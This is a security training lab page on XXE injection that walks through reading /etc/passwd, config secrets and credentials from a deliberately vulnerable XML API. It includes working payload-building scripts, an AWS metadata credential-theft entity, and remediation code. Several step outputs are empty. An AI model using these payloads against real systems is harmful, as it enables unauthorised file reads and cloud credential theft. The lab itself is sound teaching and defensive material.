Lab 15: XXE Injection

Objective

Exploit XML External Entity (XXE) injection vulnerabilities against a live XML-processing API from Kali Linux:

  1. Classic XXE — inject a SYSTEM entity to read /etc/passwd via the file:// scheme

  2. Credential exfiltration — use XXE to read internal config files with DB passwords and AWS keys

  3. Multi-endpoint XXE — exploit the same vulnerability across three different API endpoints

  4. XXE via order API — exfiltrate data through a product field reflected in the response

  5. XXE via search API — exfiltrate data through search results

  6. Audit and remediation — identify safe vs vulnerable XML parsers and implement defences

All attacks run from Kali against a live Flask API — real file reads returned in real HTTP responses.


Background

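XXE (XML External Entity) injection entered the OWASP Top 10 in 2017 as its own category (A4) and was folded into A05 (Security Misconfiguration) in the 2021 edition. It occurs when an XML parser resolves external entity declarations in attacker-supplied input, allowing the attacker to read files, reach internal URLs, or load other resources with the server's privileges and network position.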

Real-world examples:

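  • 2021 GitLab (CVE-2021-22205): GitLab passed uploaded image files to ExifTool without proper validation, and a flaw in ExifTool's DjVu metadata parsing (CVE-2021-22204) led to unauthenticated RCE. CVSS 10.0. Over 50,000 servers exposed. Strictly speaking this is a file-parser injection rather than XXE, but it shows the same underlying risk: untrusted input handed to a powerful parser.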

  • 2019 Facebook (Bug Bounty) — XXE in a Word document parser allowed reading internal AWS metadata credentials — the same 169.254.169.254 SSRF chain from Lab 10.

  • 2018 Uber (HackerOne) — XXE in a SAML authentication endpoint (SAML uses XML); researchers read internal files and proved server-side file read.

  • XXE + SSRF combo: <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/EC2Role"> reads AWS IAM credentials, exactly like Lab 10, but is triggered via XML instead of a URL parameter.

OWASP coverage: A05:2021 (Security Misconfiguration — insecure XML parser config)


Architecture

Time

40 minutes

Tools

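| Tool     | Container | Purpose                                      |
|----------|-----------|----------------------------------------------|
| curl     | Kali      | Send XML payloads to all three API endpoints |
| python3  | Kali      | Automate XXE payload variations              |
| nmap     | Kali      | Service fingerprinting                       |
| gobuster | Kali      | Enumerate XML endpoints                      |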


Lab Instructions

Step 1: Environment Setup — Launch the Vulnerable XML API

📸 Verified Output:


Step 2: Launch the Kali Attacker Container

📸 Verified Output:


Step 3: Normal XML Usage — Baseline

📸 Verified Output:


Step 4: Classic XXE — Read /etc/passwd

📸 Verified Output:

💡 The <!DOCTYPE> declaration carries an inline DTD, and the <!ENTITY xxe SYSTEM "file:///etc/passwd"> line inside it defines an external entity whose value is the content found at that URI. A parser with external entities enabled reads the file and substitutes its contents wherever &xxe; appears, and the API then reflects that text in its response. The fix: disable DOCTYPE processing entirely, or at minimum external entity resolution. An API that only exchanges data almost never needs the parser to load external files.
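
The mechanism described above can be sketched in Python. This is an illustration under assumptions, not the lab's own script: the root element name `data`, the base URL `http://victim:5000`, and both helper names are hypothetical. Only the `/api/xml/parse` path and the `file:///etc/passwd` target come from this lab.

```python
import urllib.request


def build_xxe_payload(target_uri: str, root: str = "data") -> bytes:
    """Return an XML document whose body is a single external-entity reference."""
    return (
        '<?xml version="1.0"?>\n'
        f"<!DOCTYPE {root} [\n"
        f'  <!ENTITY xxe SYSTEM "{target_uri}">\n'
        "]>\n"
        f"<{root}>&xxe;</{root}>\n"
    ).encode("utf-8")


def build_request(base_url: str, payload: bytes) -> urllib.request.Request:
    """Prepare (but do not send) a POST carrying the payload."""
    return urllib.request.Request(
        base_url + "/api/xml/parse",
        data=payload,
        headers={"Content-Type": "application/xml"},
        method="POST",
    )


payload = build_xxe_payload("file:///etc/passwd")
# Hypothetical host and port: substitute the address of the lab API.
request = build_request("http://victim:5000", payload)
print(payload.decode())

# To send it from inside the lab network:
#   with urllib.request.urlopen(request) as resp:
#       print(resp.read().decode())
```

Building the request separately from sending it keeps the payload easy to inspect before anything touches the network.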


Step 5: XXE — Read Internal Configuration Secrets

📸 Verified Output:


Step 6: XXE via Order Endpoint

📸 Verified Output:

💡 XXE doesn't require a dedicated XML parse endpoint. Any endpoint that accepts XML — order APIs, SAML assertions, RSS feed parsers, Office document uploads, SVG renderers — is potentially vulnerable. The attacker finds where file content gets reflected in the response and routes their XXE payload through that field.
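
Routing the entity through a reflected field might look like the following sketch. The element names (`order`, `product`, `quantity`) and the helper name are assumptions about the order schema, which this page does not show. The lab states only that the product field is reflected in the response.

```python
def build_field_payload(target_uri: str, root: str, field: str, extra: str = "") -> str:
    """Place the external entity inside one named field of the document."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE {root} [<!ENTITY xxe SYSTEM "{target_uri}">]>\n'
        f"<{root}><{field}>&xxe;</{field}>{extra}</{root}>"
    )


# Assumed schema: <order><product>...</product><quantity>...</quantity></order>
order_payload = build_field_payload(
    "file:///tmp/xxe_secrets/config.txt",
    root="order",
    field="product",
    extra="<quantity>1</quantity>",
)
print(order_payload)
```

Only the field carrying `&xxe;` matters to the attack. The remaining elements exist to keep the request valid for the endpoint's business logic.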


Step 7: XXE via Search Endpoint + Automated Enumeration

📸 Verified Output:


Step 8: Cleanup


Attack Summary

| Phase | Target File                 | Endpoint Used   | Data Exfiltrated                 |
|-------|-----------------------------|-----------------|----------------------------------|
| 1     | /etc/passwd                 | /api/xml/parse  | All OS user accounts             |
| 2     | /tmp/xxe_secrets/config.txt | /api/xml/parse  | DB password, AWS key, JWT secret |
| 2     | /tmp/xxe_secrets/users.txt  | /api/xml/parse  | Plaintext credentials            |
| 3     | /tmp/xxe_secrets/config.txt | /api/xml/order  | Secrets via product field        |
| 4     | /tmp/xxe_secrets/users.txt  | /api/xml/search | Credentials via results field    |
| 5     | Multiple                    | Automated       | /proc, source code, all secrets  |
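
The phases in the table above amount to pairing target files with endpoints and reflected fields. A rough sketch of that enumeration follows. The endpoint paths and file paths come from the table, while the root and field element names for each endpoint are assumptions, and nothing is sent over the network.

```python
from itertools import product

# Endpoint paths are taken from the summary table; the (root, field) element
# names are assumptions, since the request schemas are not shown on this page.
ENDPOINTS = {
    "/api/xml/parse": ("data", "value"),
    "/api/xml/order": ("order", "product"),
    "/api/xml/search": ("search", "query"),
}

# Target files listed in the summary table.
TARGETS = [
    "file:///etc/passwd",
    "file:///tmp/xxe_secrets/config.txt",
    "file:///tmp/xxe_secrets/users.txt",
]


def xxe_document(uri: str, root: str, field: str) -> str:
    """Build a document that places the external entity inside one field."""
    return (
        f'<!DOCTYPE {root} [<!ENTITY xxe SYSTEM "{uri}">]>'
        f"<{root}><{field}>&xxe;</{field}></{root}>"
    )


def enumerate_payloads():
    """Yield (endpoint, target URI, XML document) for every combination."""
    for (path, (root, field)), uri in product(ENDPOINTS.items(), TARGETS):
        yield path, uri, xxe_document(uri, root, field)


jobs = list(enumerate_payloads())
for path, uri, _doc in jobs:
    print(f"POST {path:<16} <- {uri}")
```

Keeping the endpoint map and the target list as separate data makes it simple to extend either one without touching the payload builder.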


Remediation

Python — Disable external entities (safe by default in xml.etree.ElementTree)
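
As a minimal illustration of that default, the standard-library parser refuses a document that references an external entity instead of reading the file. The helper name `parse_untrusted` and the sample document are illustrative, not taken from the lab's API code.

```python
import xml.etree.ElementTree as ET

XXE_DOC = """<?xml version="1.0"?>
<!DOCTYPE data [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<data>&xxe;</data>"""


def parse_untrusted(xml_text: str):
    """Return the parsed root element, or None if the parser rejects the input."""
    try:
        return ET.fromstring(xml_text)
    except ET.ParseError as exc:
        # ElementTree does not resolve external entities; the reference to
        # &xxe; surfaces as a parse error rather than as file contents.
        print(f"rejected: {exc}")
        return None


benign = parse_untrusted("<data>hello</data>")
blocked = parse_untrusted(XXE_DOC)
print(benign.text, blocked)
```

This covers external entities only. For untrusted input in general, the defusedxml package listed under General Defences is the more complete option.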

Python — Using lxml (vulnerable by default — must configure)
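
A hedged sketch of an explicitly hardened lxml parser is shown below. The keyword arguments are real `lxml.etree.XMLParser` options, while the function names are illustrative. Recent lxml releases have tightened their defaults, but setting these options explicitly keeps the behaviour independent of the installed version.

```python
def make_hardened_parser():
    """Build an lxml parser with entity resolution, DTD loading and network access off."""
    # Imported lazily so this module still loads where lxml is not installed.
    from lxml import etree  # third-party: pip install lxml

    return etree.XMLParser(
        resolve_entities=False,  # leave entity references unexpanded
        no_network=True,         # never fetch remote DTDs or entities
        load_dtd=False,          # do not load external DTD subsets
        dtd_validation=False,    # no DTD validation
    )


def parse_untrusted(xml_bytes: bytes):
    """Parse attacker-controlled XML with the hardened parser."""
    from lxml import etree

    return etree.fromstring(xml_bytes, parser=make_hardened_parser())
```

With `resolve_entities=False`, a reference such as `&xxe;` stays in the tree as an unexpanded entity node, so the file contents never reach the response.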

General Defences

| Defence                                         | What it blocks                        |
|-------------------------------------------------|---------------------------------------|
| Disable DOCTYPE / external entities             | Classic XXE, SSRF via XML             |
| Use defusedxml in Python                        | All XXE variants                      |
| Validate XML schema (XSD) before parsing        | Unexpected structures                 |
| Never reflect raw XML field values in responses | Limits exfiltration even if XXE works |
| WAF rules for <!ENTITY, SYSTEM, PUBLIC          | Perimeter filter                      |
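
The first row of the table, rejecting any DOCTYPE, can be approximated with the standard library alone. The sketch below uses an expat handler that fires when a DOCTYPE declaration starts. The exception and function names are hypothetical, and this is a pre-parse gate under those assumptions rather than a replacement for a hardened parser.

```python
import xml.parsers.expat


class DoctypeForbidden(ValueError):
    """Raised when an untrusted document carries a DOCTYPE declaration."""


def reject_doctype(xml_bytes: bytes) -> None:
    """Raise DoctypeForbidden if the document declares a DOCTYPE."""
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Called as soon as expat sees "<!DOCTYPE", before any entity is used.
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(xml_bytes, True)


def is_allowed(xml_bytes: bytes) -> bool:
    """Return True only for well-formed documents without a DOCTYPE."""
    try:
        reject_doctype(xml_bytes)
        return True
    except (DoctypeForbidden, xml.parsers.expat.ExpatError):
        return False


safe_ok = is_allowed(b"<order><product>widget</product></order>")
xxe_ok = is_allowed(
    b'<!DOCTYPE d [<!ENTITY x SYSTEM "file:///etc/passwd">]><d>&x;</d>'
)
print(safe_ok, xxe_ok)
```

Because the check runs inside a real XML parser, it is harder to evade with encoding or whitespace tricks than a string match for `<!ENTITY` at the perimeter.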

Further Reading
